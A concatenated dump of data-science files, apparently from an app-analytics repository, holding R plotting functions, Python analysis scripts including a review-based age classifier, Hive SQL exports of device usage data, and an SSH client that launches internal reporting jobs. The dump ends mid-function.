## Add this if you want to zoom in ----> coord_cartesian(xlim=c(0, 1), ylim=c(-2, 2))
}
plot_y_sda_improvement_x_realvalues <- function(df) {
point_size <- 3
alpha_value <- 0.1
hline <- geom_hline(aes(yintercept=0), linetype="dashed")
all_opts <- opts(axis.text.x=theme_text(size=20),
axis.text.y=theme_text(size=20),
axis.title.x=theme_text(size=20),
axis.title.y=theme_text(size=20),
legend.title=theme_text(size=20),
plot.title=theme_text(size=32),
strip.text.x = element_text(size = 25))
plot_x_realvalues_y_sdaimprovement <- ggplot(data=df, aes(x=log10(units_avg), y=SDA.Improvement)) +
facet_grid(. ~ Unit) + geom_point(alpha=alpha_value, size=point_size) + xlab("Log10(Real Values)") + ggtitle("SDA Improvemen in terms of real values.") + hline + all_opts
}
plot_y_sda_improvement_percent_x_relerror_diff_threhold <- function(df, objestimate) {
## Percentage of SDA improvement with different threhold
all_opts <- opts(axis.text.x=theme_text(size=20),
axis.text.y=theme_text(size=20),
axis.title.x=theme_text(size=20),
axis.title.y=theme_text(size=20),
legend.title=theme_text(size=20),
plot.title=theme_text(size=32),
strip.text.x = element_text(size = 25))
if (objestimate == 'CBE') {
obj_relerror <- 'CBE.Relative.Error'
} else if (objestimate == 'Overall') {
obj_relerror <- "Overall.Relative.Error"
} else if (objestimate == 'Games') {
obj_relerror <- "Games.Relative.Error"
}
stacked_df = data.frame()
for (unit in c("Downloads", "USD")) {
current_df = subset(df, Unit==unit)
threhold <- seq(0, 1, by=0.05)
percent_and_samplenum <- sapply(threhold, function(x) {
win <- current_df$SDA.Relative.Error < current_df[[obj_relerror]]
apps <- (abs(current_df$SDA.Relative.Error - current_df[[obj_relerror]]) >= x)
sample_num <- sum(apps)
c(sum(win & apps) / sample_num, sample_num)
})
percent <- percent_and_samplenum[1,]
samplenum <- percent_and_samplenum[2,]
percent_df <- data.frame(threhold, percent, samplenum, unit)
stacked_df <- rbind(stacked_df, percent_df)
}
percent_plot <- ggplot(data=stacked_df, aes(x=threhold, y=percent)) + facet_grid(. ~ unit) + geom_line() + geom_text(aes(y=percent+0.1, label=samplenum), size=4)+ geom_hline(aes(yintercept=0.5), linetype="dashed") + xlab("Difference of Relative Error >=") + ylab("Percentage of SDA Improvement") + ggtitle(paste("Percentage of SDA Improvement vs", objestimate, "\n(Labels are number of apps)")) + all_opts
}
## The following function (multiplot) is from
## http://wiki.stdout.org/rcookbook/Graphs/Multiple%20graphs%20on%20one%20page%20(ggplot2)/
##
# Multiple plot function
#
# ggplot objects can be passed in ..., or to plotlist (as a list of ggplot objects)
# - cols: Number of columns in layout
# - layout: A matrix specifying the layout. If present, 'cols' is ignored.
#
# If the layout is something like matrix(c(1,2,3,3), nrow=2, byrow=TRUE),
# then plot 1 will go in the upper left, 2 will go in the upper right, and
# 3 will go all the way across the bottom.
#
multiplot <- function(..., plotlist=NULL, file, cols=1, layout=NULL) {
require(grid)
# Make a list from the ... arguments and plotlist
plots <- c(list(...), plotlist)
numPlots = length(plots)
# If layout is NULL, then use 'cols' to determine layout
if (is.null(layout)) {
# Make the panel
# ncol: Number of columns of plots
# nrow: Number of rows needed, calculated from # of cols
layout <- matrix(seq(1, cols * ceiling(numPlots/cols)),
ncol = cols, nrow = ceiling(numPlots/cols))
}
if (numPlots==1) {
print(plots[[1]])
} else {
# Set up the page
grid.newpage()
pushViewport(viewport(layout = grid.layout(nrow(layout), ncol(layout))))
# Make each plot, in the correct location
for (i in 1:numPlots) {
# Get the i,j matrix positions of the regions that contain this subplot
matchidx <- as.data.frame(which(layout == i, arr.ind = TRUE))
print(plots[[i]], vp = viewport(layout.pos.row = matchidx$row,
layout.pos.col = matchidx$col))
}
}
}
<file_sep>/aa_au_model/correction/__init__.py
__author__ = 'hgriffioen'<file_sep>/product_quality/app_behavior.py
'''
Created on Apr 19, 2013
@author: perezrafael
'''
import pandas as pd
import numpy as np
import calendar
from internal import utilities
from internal import config
import statsmodels.api as sm
import matplotlib.pyplot as plt
def _get_top_apps_by_actuals(df, top):
df = df.groupby('app_id').sum().reset_index()
df = df[:top]
df = df[['app_id']]
return df
def _get_full_period_app_actuals (df):
size = df.groupby('app_id').size().reset_index()
max = size[0].max()
size = size[size[0]==max][['app_id']]
return size
def plot_autocorrelations(df, fig_title):
dir = './data/plots'
corr_array = []
df = df.groupby('app_id')
for name, group in df:
group = group.sort('date', ascending=True)
autocorrelation = sm.tsa.stattools.acf(group['units'].values, nlags=90)
for i in range(len(autocorrelation)):
if len(corr_array) == i:
corr_array.append([])
corr_array[i].append(autocorrelation[i])
plt.clf()
ax = plt.subplot(111)
ax.boxplot(corr_array)
ax.set_xticklabels(range(len(corr_array)))
#plt.grid(True, axis='x')
plt.xlabel('Lag')
plt.ylabel('Autocorrelation')
plt.title(fig_title)
plt.savefig('%s/%s.png'%(dir,fig_title))
#plt.show()
return corr_array
def main():
platforms = ['ios', 'android']
units = ['Downloads', 'USD']
top = 20
year = '2013'
months = ['01', '02', '03']
for platform in platforms:
if platform =='ios':
country_ids = [143441,143465,143466,143462,143444]
else:
country_ids =[10,7,9,27,3]
for country_id in country_ids:
if True:
month=03
#for month in months:
for unit in units:
dtstart = '%s-%s-01'%(year, '01')
dtend = '%s-%s-%s'%(year, month, calendar.monthrange(int(year),int(month))[1])
df = utilities._fetch_from_db(platform, country_id, unit, dtstart, dtend)
if unit=='USD':
df.rename(columns={'revenue':'units'}, inplace=True)
if platform=='ios':
country_name = config.IOS_STORES_DICT[country_id]
elif platform=='android':
country_name = config.ANDROID_STORES_DICT[country_id]
df.rename(columns={'app_class':'app_id'}, inplace=True)
try:
full_period = _get_full_period_app_actuals(df)
full_period = full_period.merge(df, on='app_id', how='inner')
top20 = _get_top_apps_by_actuals(full_period, 20)
top20 = top20.merge(df, on='app_id', how='inner')
plot_title = 'autocorrelation_monthly_top20_%s_%s_%s_%s_%s'%(platform, country_name, unit, dtstart, dtend)
plot_autocorrelations(top20, plot_title)
#daily_top20 df.groupby('date')
except:
pass
if __name__ == '__main__':
main()<file_sep>/aa_au_model/hive_ql/export_active_devices.sql
drop table if exists active_devices_weekly_export;
create table active_devices_weekly_export (
end_period_date string,
device_id string
)
row format delimited fields terminated by '\t'
lines terminated by '\n'
stored as textfile
location 's3://aardvark-prod-pdx-ds-workspace/active-weekly'
;
insert overwrite table active_devices_weekly_export
select
x.datestr as end_period_date,
x.device_id
from (
select
active.datestr,
active.device_id,
cast(count(distinct(active.date)) as int) as n_active
from
usage_model_selected_device_timezone_weekly active
group by
active.datestr,
active.device_id
having
cast(count(distinct(active.date)) as int) = 7
) x
;
drop table active_devices_monthly_export;
create table active_devices_monthly_export (
end_period_date string,
device_id string
)
row format delimited fields terminated by '\t'
lines terminated by '\n'
stored as textfile
location 's3://aardvark-prod-pdx-ds-workspace/active-monthly'
;
insert overwrite table active_devices_monthly_export
select
x.datestr as end_period_date,
x.device_id
from (
select
active.datestr,
active.device_id,
cast(count(distinct(active.date)) as int) as n_active
from
usage_model_selected_device_timezone_monthly active
group by
active.datestr,
active.device_id
having
cast(count(distinct(active.date)) as int) = day(active.datestr)
) x
;
<file_sep>/user_profile/hive_ql/export_usage_personas.sql
set hive.auto.convert.join = true;
set hive.exec.dynamic.partition = true;
set start_date = '2015-05-01';
set end_date = '2015-05-31';
-- select weekly active devices
drop table if exists period_active_weekly;
create table period_active_weekly
as
select
x.datestr,
x.device_id
from (
select
active.datestr,
active.device_id,
cast(count(distinct(active.date)) as int) as n_active
from
usage_model_selected_device_timezone_weekly active
group by
active.datestr,
active.device_id
having
cast(count(distinct(active.date)) as int) = 7
) x
;
-- Get unique iOS devices
drop table if exists ios_devices_types;
create table ios_devices_types
as
select
device_id,
type
from
vpn_new_device_info
where
platform = 'iOS'
and type in ('Smartphone', 'Tablet')
group by
device_id,
type
;
-- select iphone and ipads active between start_date and end_date
drop table if exists useful_devices;
create table useful_devices
as
select
distinct active.device_id
from
period_active_weekly active
join ios_devices_types ios
on ios.device_id = active.device_id
where
datestr between ${hiveconf:start_date} and ${hiveconf:end_date}
;
-- get bundle ids and categories
-- get category per bundle_id
drop table if exists category;
create table category
as
select
distinct bundle_id,
app_category as category
from
vpn_sample_dpi_apps
;
-- select usage for useful devices between start date and end date
drop table if exists usage_active_devices;
create table usage_active_devices
as
select
x.device_id,
x.bundleid,
x.week_number,
count(x.session_duration) as num_sessions,
sum(x.session_duration) as total_session_duration,
percentile(cast(x.session_duration as BIGINT), 0.5) as median_session_duration
from (
select
usage.device_id,
weekofyear(usage.datestr) as week_number,
usage.bundleid,
(endtime-starttime)/1000 as session_duration
from
vpn_sample_data_session usage
join useful_devices dev
on dev.device_id = usage.device_id
where
usage.datestr between ${hiveconf:start_date} and ${hiveconf:end_date}
having (endtime-starttime)/1000 >= 1
) x
group by
x.device_id,
x.bundleid,
x.week_number
;
-- Export daily data
drop table usage_active_devices_export;
create table usage_active_devices_export (
device_id string,
bundleid string,
category string,
week_number int,
num_sessions int,
total_session_duration double,
median_session_duration double)
row format delimited fields terminated by '\t'
lines terminated by '\n'
stored as textfile
location 's3://aardvark-prod-pdx-ds-workspace/daily_data'
;
insert overwrite table usage_active_devices_export
select
device_id,
usage.bundleid,
category,
week_number,
num_sessions,
total_session_duration,
median_session_duration
from
usage_active_devices usage
join category categ
on categ.bundle_id = usage.bundleid
;
<file_sep>/aa_au_model/correction/plot.py
__author__ = 'hgriffioen'
import numpy as np
import pandas as pd
import sklearn
from matplotlib import pyplot as plt
from sklearn import learning_curve as lc
def roc(estimator, X, y_true, figsize=(6, 5), **kwargs):
"""
Plot ROC curve.
:param estimator: Estimator to plot ROC curve for
:param X: input data
:param y_true: true labels
:param figsize: Size of figure
:param kwargs: Keyword arguments for plt.figure()
:return: plt.figure(), plt.gca()
"""
# Generate ROC curve.
test_prob = estimator.predict_proba(X)
roc_auc = sklearn.metrics.roc_auc_score(y_true, test_prob[:, 1])
fpr, tpr, thresholds = sklearn.metrics.roc_curve(y_true, test_prob[:, 1])
fig = plt.figure(figsize, kwargs)
ax = fig.gca()
ax.plot(fpr, tpr)
# Get classifier point from confusion matrix.
conf_matrix = sklearn.metrics.confusion_matrix(y_true, estimator.predict(X))
fpr_optimum = conf_matrix[0, 1] * 1. / conf_matrix[0].sum()
tpr_optimum = conf_matrix[1, 1] * 1. / conf_matrix[1].sum()
ax.plot(fpr_optimum, tpr_optimum, 'or')
# Draw straight line (= random guessing).
ax.plot([0, 1], [0, 1], ':k')
# Format plot
ax.axis('equal')
ax.set_xlim([-0.0, 1.2])
ax.set_ylim([-0.0, 1.01])
ax.set_title('ROC AUC: %1.2f' % roc_auc)
ax.set_xlabel('False Positive Rate (fall-out)')
ax.set_ylabel('True Positive Rate (sensitivity)')
ax.legend(['ROC curve', 'Classifier', 'Random guessing'])
return fig, ax
def learning_curve(estimator, X, y, **kwargs):
"""
Plot learning curve.
:param estimator: Estimator to plot learning curve for
:param X: input data
:param y: labels
:param kwargs: Additional keyword arguments for sklearn.learning_curve.learning_curve
:return: plt.figure(), plt.gca()
"""
(train_sizes, train_scores,
test_scores) = lc.learning_curve(estimator, X, y, **kwargs)
train_scores_mean = np.mean(train_scores, axis=1)
train_scores_std = np.std(train_scores, axis=1)
test_scores_mean = np.mean(test_scores, axis=1)
test_scores_std = np.std(test_scores, axis=1)
fig = plt.figure()
ax = fig.gca()
ax.grid()
ax.fill_between(train_sizes, train_scores_mean - train_scores_std,
train_scores_mean + train_scores_std, alpha=0.1,
color="r")
ax.fill_between(train_sizes, test_scores_mean - test_scores_std,
test_scores_mean + test_scores_std, alpha=0.1, color="g")
ax.plot(train_sizes, train_scores_mean, 'o-', color="r", label="Training score")
ax.plot(train_sizes, test_scores_mean, 'o-', color="g", label="Cross-validation score")
ax.legend(loc="best")
ax.set_xlabel("# training examples")
ax.set_ylabel("AUC ROC Score")
return fig, ax
def grid_validation_curve(grid_search, param_1, param_2, scoring_name='roc_auc', **kwargs):
"""
Plot validation curve obtained by two parameter grid search.
:param grid_search: sklearn.grid_search.GridSearchCV object
:param param_1: first grid search parameter (put on x-axis)
:param param_2: second grid search parameter (plotted as separate lines)
:param scoring_name: name of scoring functino
:param kwargs: Additional keyword arguments for pd.DataFrame.plot
:return: plt.figure(), plt.gca()
"""
# Get parameter values and scores.
unpacked_results = [(s.parameters[param_1], s.parameters[param_2],
s.mean_validation_score) for s in grid_search.grid_scores_]
values_1, values_2, scores = zip(*unpacked_results)
results = pd.DataFrame({param_1: np.round(values_1, 2),
param_2: np.round(values_2, 2),
scoring_name: scores})
pivoted_df = results.pivot(index=param_1, columns=param_2, values=scoring_name)
fig = plt.figure()
ax = fig.gca()
pivoted_df.plot(title='Validation curve', figsize=(10, 6), ax=ax, **kwargs)
ax.set_xlabel('# features $ k $')
ax.set_ylabel('AUC ROC score')
return fig, ax
<file_sep>/datathon/visualizations/README.MD
# Usage Visualizations
<file_sep>/old_investigations/android/scaling.py
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib.ticker import *
# plot top 30 linear
# plot top 30 semi-logarithmic
# plot log-logarithmic (all)
# plot top 200 linear
#x = dict(grouped.mean()['units'])
df = pd.read_csv('dump.csv')
df = df[df['rank'] <= 25]
K = 123456789
ws = K / df.groupby('day')['units'].sum()
x = pd.DataFrame(ws)
x = x.reset_index()
x.rename(columns={'units':'weight'}, inplace=True)
scaled = x.merge(df, on='day')
ml1 = AutoMinorLocator()
ml2 = AutoMinorLocator()
ax = plt.subplot(211)
plt.plot(df['rank'], df['units'], 'ro', alpha=0.4)
plt.plot(*zip(*df.groupby('rank')['units'].mean().iteritems()), color='black', lw=2.0, marker='s')
ax.xaxis.set_minor_locator(AutoMinorLocator())
plt.grid(True, which='both')
plt.xlabel('rank')
plt.ylabel('downloads (original)')
scaled['scaled'] = scaled['units'] * scaled['weight']
ax = plt.subplot(212)
plt.plot(scaled['rank'], scaled['scaled'], 'o', alpha=0.4)
plt.plot(*zip(*scaled.groupby('rank')['scaled'].mean().iteritems()), color='black', lw=2.0, marker='s')
ax.xaxis.set_minor_locator(AutoMinorLocator())
plt.grid(True, which='both')
plt.xlabel('rank')
plt.ylabel('downloads (scaled by daily weight)')
plt.savefig('scaling.png')
#plt.show()
<file_sep>/audience/legacy_experiments/vowpal_wabbit_age.py
# coding: utf-8
# In[20]:
import matplotlib.pyplot as plt
get_ipython().magic(u'matplotlib inline')
import os
from time import asctime, time
import subprocess
import csv
import numpy as np
import pandas as pd
from nltk.corpus import wordnet
from collections import defaultdict
from nltk.tokenize import wordpunct_tokenize
import nltk
from unidecode import unidecode
import random
import re
from nltk.corpus import stopwords
import collections
from nltk import FreqDist
from guess_language import guess_language
import re
import itertools
import sklearn.linear_model as lm
from collections import Counter
import scipy as sp
from joblib import Parallel, delayed
import cPickle
import string
import psutil
import os
from sklearn.ensemble import AdaBoostRegressor
from sklearn.ensemble import RandomForestRegressor
from sklearn.ensemble import RandomForestClassifier
# In[21]:
DATA_DIR = '/Users/perezrafael/appannie/data/demie'
TRAIN_FILE = 'age_train_full.csv'
TEST_FILE = 'ios_reviews_143441_201402.csv'
JOBS = 1
TRAIN_CLASSIFIER = False
MIN_REVIEWS_PER_NGRAM = 10
MODEL_NAME = 'age'
test_ids = [284882215, 447188370, 529479190, 553834731, 333903271, 284862083, 578463146, 538212549, 725008683]
# In[22]:
def guess_lang(x):
lang = 'UKNOWN'
try:
lang = guess_language(x.decode('utf-8'))
#lang = guess_language(x)
except:
pass
lang = str(lang)
return lang
def is_in_range(x, min, max):
if x >= min and x <= max:
return 1
return np.nan
def generate_vector(x, train_words):
return [(1 if tw in x else 0) for tw in train_words]
def features(x, ex_word, pattern, control, MIN_N, MAX_N):
x = x.lower()
x = ''.join([c for c in x if c in control])
x = pattern.sub(' ', x)
x = wordpunct_tokenize(x)
x = [w for w in x if len(w)>1]
n_tokens = len(x)
n_grams = []
for i in xrange(n_tokens):
for j in xrange(i+MIN_N, min(n_tokens, i+MAX_N)+1):
n = x[i:j]
n = [w for w in n if w not in ex_word]
n_grams.append(' '.join(n))
n_grams = list(set(n_grams))
return n_grams
def fit_clf(clf, a, b):
clf.fit(a, b)
return clf
def train_parallel(jobs, features, target):
features = np.array(features)
target = np.array(target)
index = range(len(target))
random.shuffle(index)
chunk_size = 5000
if jobs<2:
chunk_size = len(target)
print 'Training on full set'
chunks = [index[x:x+chunk_size] for x in xrange(0, len(index), chunk_size)]
def producer():
for chunk in chunks:
yield (features[chunk], target[chunk])
D = delayed(fit_clf)
a = [D(RandomForestClassifier(n_jobs=4), i[0], i[1])
for i
in producer()]
r = Parallel(n_jobs=jobs)(a)
clf = r[0]
#coefs = []
#for r1 in r:
# coefs.append(r1.coef_)
#clf.coef_ = np.mean(coefs, axis=0)
return clf
def apply_func(df_chunk, new_column, column, function, extra_params=None, save_to_csv=False):
if extra_params is None:
df_chunk[new_column] = df_chunk[column].apply(function)
else:
df_chunk[new_column] = df_chunk[column].apply(lambda x: function(x, *extra_params))
return df_chunk
def apply_parallel(df, jobs, new_column, column, function, extra_params=None, save_to_csv=False):
index = df.index.values
chunk_size = 5000
chunks = [index[x:x+chunk_size] for x in xrange(0, len(index), chunk_size)]
def producer():
for chunk in chunks:
yield (df.ix[chunk])
D = delayed(apply_func)
a = [D(i, new_column, column, function, extra_params, save_to_csv)
for i
in producer()]
r = Parallel(n_jobs=jobs, backend='threading')(a)
df = pd.concat(r)
return df
def predict_func(df, clf, features_column, target_column):
df[target_column] = clf.predict(list(df[features_column]))
return df
def predict_parallel(df, jobs, features_column, target_column, clf):
index = df.index.values
chunk_size = 5000
chunks = [index[x:x+chunk_size] for x in xrange(0, len(index), chunk_size)]
def producer():
for chunk in chunks:
yield (df.ix[chunk])
D = delayed(predict_func)
a = [D(i, clf, features_column, target_column)
for i
in producer()]
r = Parallel(n_jobs=jobs)(a)
df = pd.concat(r)
return df
# In[23]:
control = string.printable.replace('\t\n\r\x0b\x0c', '')
pattern = re.compile('[_\d]+')
sw = stopwords.words('english')
sw.extend(['ll', 've'])
sw = set(sw)
print control
# In[24]:
df_train = pd.read_csv('%s/%s'%(DATA_DIR, TRAIN_FILE), error_bad_lines=False)
df_train['age'] = df_train['age'].apply(lambda x: int(np.floor(x/10.0)))
df_train['age'][df_train['age']>6] = 6
# In[25]:
df_train.columns
# In[26]:
if TRAIN_CLASSIFIER:
#df_train = df_train[:20000]
#df_train['text'] = df_train.apply(lambda x: ' '.join([str(x['title']), str(x['text'])]), axis = 1)
#df_train['text'] = df_train['text'].apply(guess_language)
#df_train = apply_parallel(df_train, JOBS, 'lang', 'text', guess_lang)
print df_train.info()
#df_train = df_train[df_train['lang']=='en']
df_train = df_train.drop(['date', 'from_train', 'reviewer', 'byear'], axis=1)
df_train = apply_parallel(df_train, JOBS, 'text', 'text', features, [sw, pattern, control, 1, 3])
#df_train['text'] = df_train['text'].apply(lambda x: features(x, sw, pattern, control, 1, 2))
df_train.rename(columns={'text':'tokens'}, inplace=True)
df_train['token_count'] = df_train['tokens'].apply(len)
df_train = df_train[df_train['token_count']>3]
print df_train.info()
train_words = list(itertools.chain(*df_train['tokens']))
train_words = list(set([value for value, count in Counter(train_words).items() if count >= MIN_REVIEWS_PER_NGRAM]))
if '' in train_words: train_words.remove('')
print len(train_words)
# save train words
with open('%s/%s_train_words.pkl'%(DATA_DIR, MODEL_NAME), 'wb') as fid:
cPickle.dump(train_words, fid)
#df_train = apply_parallel(df_train, JOBS, 'vectors', 'tokens', generate_vector, [train_words])
#df_train['vectors'] = df_train['tokens'].apply(lambda x: generate_vector(x, train_words))
#del df_train['tokens']
#clf = train_parallel(JOBS, train_matrix, df_train['AGE'].values)
#clf.fit(list(df_train['vectors']), df_train['age'])
index = df_train.index.values
random.shuffle(index)
chunk_size = 50000
chunks = [index[x:x+chunk_size] for x in xrange(0, len(index), chunk_size)]
clfs = []
for chunk in chunks:
df_chunk = df_train.ix[chunk].copy()
#df_chunk = apply_parallel(df_chunk, JOBS, 'vectors', 'tokens', generate_vector, [train_words])
df_chunk['vectors'] = df_chunk['tokens'].apply(lambda x: generate_vector(x, train_words))
clf = RandomForestClassifier(n_estimators=4, n_jobs=4)
clf.fit(list(df_chunk['vectors']), df_chunk['age'])
clfs.append(clf)
del df_chunk
print clf
del df_train['tokens']
clf = clfs[0]
estimators=[]
for c in clfs:
estimators.extend(c.estimators_)
clf.estimators_ = estimators
clf.n_estimators = len(estimators)
with open('%s/%s_classifier.pkl'%(DATA_DIR, MODEL_NAME), 'wb') as fid:
cPickle.dump(clf, fid)
#print 'score: ', clf.score(list(df_train['vectors']), df_train['age'])
else:
# load train words
with open('%s/%s_train_words.pkl'%(DATA_DIR, MODEL_NAME), 'rb') as fid:
train_words = cPickle.load(fid)
# load clasifier
with open('%s/%s_classifier.pkl'%(DATA_DIR, MODEL_NAME), 'rb') as fid:
clf = cPickle.load(fid)
#df_train = df_train[df_train['app_id'].isin(test_ids)]
print len(train_words)
#print len(np.where(np.abs(clf.coef_)>1)[0])
print clf
# In[35]:
df_obs = pd.read_csv('%s/%s'%(DATA_DIR, TEST_FILE), error_bad_lines=False)
df_obs.columns = ['app_id', 'date', 'title', 'text', 'reviewer']
#df_obs = df_obs[df_obs['app_id'].isin(test_ids)]
#df_obs['text'] = df_obs.apply(lambda x: ' '.join([str(x['title']), str(x['text'])]), axis = 1)
#del df_obs['title']
#df_obs = apply_parallel(df_obs, JOBS, 'lang', 'text', guess_lang)
#df_obs = df_obs[df_obs['lang'] == 'en']
#del df_obs['lang']
#df_app_id_reviewer = df_obs[['app_id', 'reviewer']].drop_duplicates()
#print df_app_id_reviewer.shape
#df_obs = apply_parallel(df_obs, JOBS, 'text', 'text', features, [sw, pattern, control, 1, 3])
#df_obs['text'] = df_obs['text'].apply(lambda x: features(x, sw, pattern, control, 1, 2))
#df_obs.rename(columns={'text':'tokens'}, inplace=True)
print df_obs.columns
print df_obs.shape
df_obs = df_obs.groupby('app_id')
# In[ ]:
#df_obs = apply_parallel(df_obs, JOBS, 'vectors', 'tokens', generate_vector, [train_words])
#print 'generate_vector done'
#df_obs = predict_parallel(df_obs, JOBS, 'vectors', 'age_group', clf)
#df_obs['predicted_age'] = clf.predict(list(df_obs['vectors'])
done_files = os.listdir('%s/predictions'%DATA_DIR)
def predict(n, g, filename, files_done):
new_file = 'pred_%s_%s'%(n, filename)
if new_file in files_done:
return
g['text'] = g.apply(lambda x: ' '.join([str(x['title']), str(x['text'])]), axis = 1)
g['lang'] = g['text'].apply(guess_lang)
g = g[g['lang'] == 'en']
g['text'] = g['text'].apply(lambda x: features(x, sw, pattern, control, 1, 3))
g['vectors'] = g['text'].apply(lambda x: generate_vector(x, train_words))
try:
g['age_group'] = clf.predict(list(g['vectors']))
except Exception,e:
print e
print g
return
g[['date', 'app_id', 'age_group']].to_csv('%s/predictions/%s'%(DATA_DIR, new_file), index=False)
files = ['ios_reviews_143441_201301.csv', 'ios_reviews_143441_201303.csv',
'ios_reviews_143441_201305.csv', 'ios_reviews_143441_201307.csv',
'ios_reviews_143441_201309.csv', 'ios_reviews_143441_201311.csv',
'ios_reviews_143441_201401.csv', 'ios_reviews_143441_201302.csv',
'ios_reviews_143441_201304.csv', 'ios_reviews_143441_201306.csv',
'ios_reviews_143441_201308.csv', 'ios_reviews_143441_201310.csv',
'ios_reviews_143441_201312.csv', 'ios_reviews_143441_201402.csv']
def producer():
for n,g in df_obs:
yield n, g.copy()
for filename in files:
D = delayed(predict)
a = [D(i[0], i[1], filename, done_files)
for i in producer()]
Parallel(n_jobs=JOBS)(a)
# In[ ]:
df_obs2 = df_obs[['app_id', 'age_group']]
# In[ ]:
df_obs2.to_csv('%s/pred_%s'%(DATA_DIR, TEST_FILE), index=False)
# In[ ]:
benchmark_df = df_train[['age']]
benchmark_df['age_group'] = benchmark_df['age']
benchmark_df = benchmark_df[['age_group']]
benchmark_df = benchmark_df.groupby('age_group').size().reset_index()
benchmark_df['%a'] = (benchmark_df[0]/(benchmark_df[0].sum() * 1.0))*100
benchmark_df['%a'] = benchmark_df['%a'].apply(lambda x: round(x, 1))
# In[ ]:
benchmark_df
# In[ ]:
def get_app_dist(df, benchmark_df, app_id):
benchmark_df = benchmark_df[benchmark_df['app_id']==app_id]
benchmark_df['age_group'] = benchmark_df['age']
benchmark_df = benchmark_df[['age_group']]
benchmark_df = benchmark_df.groupby('age_group').size().reset_index()
benchmark_df['%a'] = (benchmark_df[0]/(benchmark_df[0].sum() * 1.0))*100
benchmark_df['%a'] = benchmark_df['%a'].apply(lambda x: round(x, 1))
res = df[df['app_id']==app_id].groupby(['age_group']).size().reset_index()
res['%'] = (res[0]/res[0].sum())*100
res = res.merge(benchmark_df, on='age_group', how='left')
fig, ax = plt.subplots()
ind = np.arange(len(res))
width = 0.35
rects1 = ax.bar(ind, res['%'], width, color='b')
rects2 = ax.bar(ind+width, res['%a'], width, color='r')
#ax.bar(ind+width, res['%'])
#ax.bar(ind+width, benchmark_df['%a'])
plt.axis([0, len(res), 0, 100])
ax.set_xticks(ind+(2*width))
ax.set_xticklabels(res['age_group'], rotation='vertical')
ax.legend((rects1[0], rects2[0]), ('Prediction', 'Training') )
plt.grid(True)
plt.xlabel('Age Range')
plt.ylabel('User Percentage')
#plt.plot(ind, res['age_group'], 'o')
print res
plt.show()
#return res
# In[ ]:
def show_app_diff(df, benchmark_df, app_id):
res = df[df['app_id']==app_id]
res2 = res.groupby('age_group').size().reset_index()
res2['%'] = (res2[0]/(res2[0].sum() * 1.0))*100
res2['%'] = res2['%'].apply(lambda x: round(x, 1))
#print benchmark_df.columns
res2 = res2.merge(benchmark_df, on = ['age_group'], how = 'left')
#res2['%diff'] = res2['%'] / res2['%a'] - 1.0
res2['%diff'] = res2['%'] - res2['%a']
fig, ax = plt.subplots()
ind = np.arange(len(res2))
#print ind
width = 0.35
colors = []
for value in res2['%diff']: # keys are the names of the boys
if value > 0:
colors.append('g')
else:
colors.append('r')
ax.bar(ind+width, res2['%diff'], color = colors)
ax.set_xticks(ind+(2*width))
ax.set_xticklabels((ind+1))
#plt.plot(ind, res['age_group'], 'o')
plt.axis([0, len(res2), -50, 50])
plt.grid(True)
plt.xlabel('Age Range')
plt.ylabel('User Percentage - Benchmark Percentage')
#plt.title('Histogram of User Age')
# In[ ]:
get_app_dist(df_obs2, df_train, 284882215) #Facebook
show_app_diff(df_obs2, benchmark_df, 284882215)
# In[ ]:
get_app_dist(df_obs2, df_train, 447188370) #Snapchat
show_app_diff(df_obs2, benchmark_df, 447188370)
# In[ ]:
get_app_dist(df_obs2, df_train, 529479190) #Clash of Clans
show_app_diff(df_obs2, benchmark_df, 529479190)
# In[ ]:
get_app_dist(df_obs2, df_train, 553834731) #Candy Crush
show_app_diff(df_obs2, benchmark_df, 553834731)
# In[ ]:
get_app_dist(df_obs2, df_train, 333903271) #Twitter
show_app_diff(df_obs2, benchmark_df, 333903271)
# In[ ]:
get_app_dist(df_obs2, df_train, 284862083) #NY times
show_app_diff(df_obs2, benchmark_df, 284862083)
# In[ ]:
get_app_dist(df_obs2, df_train, 578463146) #Egg baby
show_app_diff(df_obs2, benchmark_df, 578463146)
# In[ ]:
get_app_dist(df_obs2, df_train, 538212549) #Big fish casino
show_app_diff(df_obs2, benchmark_df, 538212549)
# In[ ]:
get_app_dist(df_obs2, df_train, 725008683) #Turbo tax
show_app_diff(df_obs2, benchmark_df, 725008683)
# In[ ]:
# In[ ]:
<file_sep>/tooling/DistimoClients/distimo_clients/moneymaker.py
import configparser
import inspect
import os
import paramiko
from time import gmtime, strftime
class Client:
def __init__(self, host="", user="", password="", port=""):
"""
Loads MoneyMaker settings and creates connection. File settings.ini or
clients/settings.ini is read if no parameters are given.
"""
if host is None or host is "":
# Parse settings.ini
config = configparser.ConfigParser()
config.read('settings.ini')
if "MoneyMaker" not in config.keys():
path_to_class = os.path.dirname(inspect.getfile(self.__class__))
settings_path = (path_to_class + os.sep + 'settings.ini')
config.read(settings_path)
try:
self.host = config['MoneyMaker']['host']
self.user = config['MoneyMaker']['user']
self.password = config['MoneyMaker']['password']
self.port = config['MoneyMaker']['port']
except KeyError:
print('Error loading settings.ini file(s).')
raise
else:
# Unpack arguments.
self.host = host
self.user = user
self.password = <PASSWORD>
self.port = port
self.client = None
self.create_client()
def create_client(self):
self.client = paramiko.SSHClient()
self.client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.client.connect(self.host, username=self.user,
password=self.password, port=int(self.port))
return self.client
def close_client(self):
self.client.close()
def execute_job(self, client_query_file, report, client='', metric_tree='',
detach_job=True, time_till_job_start=0, time_between_jobs=0,
simultaneous_jobs=1):
"""
Executes a job on report1.
Params:
- client_query_file_list: Path to query file. If a list with
paths to query files is supplied, each query file is evaluated in
a different moneymaker session.
- report: Report to run
- client: Client (optional)
- metric_tree: Path to algorithm.
- detach_job: Flag to run detached.
- time_between_jobs: Time to wait before the next job is run in
seconds (can be used to avoid lock time-out problems). Use
"""
job_name = (strftime("%Y%m%d%H%M%S", gmtime()) + "_" +
(client + "_" if client else '') + report)
svn_up_command = 'cd /home/%s/moneymaker/ && svn update' % self.user
launch_command = 'cd /home/%s/moneymaker/ &&' % self.user
if detach_job:
launch_command += ' screen -AmdS ' + job_name
launch_command += " bash -c 'sleep {} && ./moneymaker.php"
if client:
launch_command += ' -c ' + client
if metric_tree:
launch_command += ' -v mt:' + metric_tree
launch_command += ' ' + report
if isinstance(client_query_file, str):
client_query_file = [client_query_file]
money_maker_commands = []
for i_file, current_query in enumerate(client_query_file):
sleep_time = time_till_job_start + (i_file/simultaneous_jobs) * time_between_jobs # counter will increase by 1 after # simultaneous_jobs are queued
job_command = (launch_command.format(sleep_time) + ' -v cqf:' +
current_query + "'")
